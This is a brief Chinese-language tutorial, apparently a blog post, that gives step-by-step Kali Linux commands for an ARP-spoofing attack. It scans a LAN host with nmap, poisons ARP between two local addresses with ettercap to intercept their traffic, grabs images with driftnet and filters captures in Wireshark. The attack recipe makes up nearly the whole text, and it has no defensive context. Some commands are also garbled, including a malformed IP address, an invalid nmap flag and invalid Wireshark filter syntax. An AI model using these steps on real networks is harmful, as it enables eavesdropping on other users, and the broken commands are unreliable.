Kali Linux嗅探ARP欺骗抓包分析教程:

root@kali:~# nmap 192.168.0.104
root@kali:~# nmap -v -A 192.168 0.014
root@kali:~# nmap -O 192.168.0.104
root@kali:~# nmap -sn -Tq 192.168.0.104
root@kali:~# ettercap
root@kali:~# ettercap -i wlan0 -Tq  -M arp:remote //192.168.0.104// //192.168.0.102//
root@kali:~# driftnet
root@kali:~# driftnet -i 2
root@kali:~# wireshark

过滤器输入:

IP.src-hosts==192.168.0.104 || tcp
IP.src-hosts==192.168.0.104 || http

OK,Done!

你可能感兴趣的:(Kali Linux嗅探ARP欺骗抓包分析教程:)